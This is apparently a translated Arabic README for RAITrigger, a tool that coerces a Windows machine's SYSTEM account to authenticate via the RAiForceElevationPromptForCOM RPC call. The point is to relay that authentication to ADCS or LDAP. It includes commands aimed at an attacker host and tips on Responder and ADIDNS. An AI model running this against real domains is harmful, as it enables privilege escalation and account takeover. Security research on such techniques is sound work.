
مشغل المصادقة المحلية SYSTEM للترحيل
وظيفة RPC RAiForceElevationPromptForCOM من مكتبة appinfo.dll تسمح بالإكراه على SYSTEM. هذا يعمل فقط على الأنظمة المنضمة إلى نطاق. اتضح أنه يمكن استدعاء هذه الوظيفة من أي مستخدم منخفض الامتياز (ليس لتشغيل عملية) ولكن لتحريك مصادقة SYSTEM إلى موقع عشوائي. وذلك لأن CreateFileW يتم استدعاؤها كـ SYSTEM إلى موقع المعامل الأول:
نظرًا لأن المستخدم منخفض الامتياز لا يزال منتحلاً، لا يمكن استخدام هذا كمشغل Potato لرفع الامتيازات من SEImpersonate إلى SYSTEM:
ولكن يمكن استخدامه لطلب شهادة حساب كمبيوتر مقابل ADCS عندما يكون التسجيل عبر الويب ممكّنًا مع مصادقة SMB الواردة. أو يمكن استخدامه لـ LPE مع الترحيل إلى LDAP - عندما لا يكون توقيع LDAP ممكّنًا.
لتحريك مصادقة SMB:
[*] RAITrigger.exe \\attackerip\test\test.exe
لتحريك مصادقة HTTP (يجب تمكين خدمة WebClient):
[*] RAITrigger.exe \\hostname@80\test\test.exe
يتم تحريك مصادقة HTTP فقط لأنظمة منطقة الإنترانت الموثوقة، لذا ستحتاج إلى إنشاء سجل ADIDNS لعنوان Kali IP الخاص بك أو أن تكون في نفس الشبكة الفرعية واستخدام e.G. Responder. لا تستخدم أبدًا اسم FQDN كامل، فقط اسم المضيف.
استدعاء هذه الوظيفة عن بُعد (حتى مع مسؤول محلي) يؤدي إلى rpc_access_denied لذلك هذا ليس بديلاً عن e.G. PetitPotam أو ما شابه: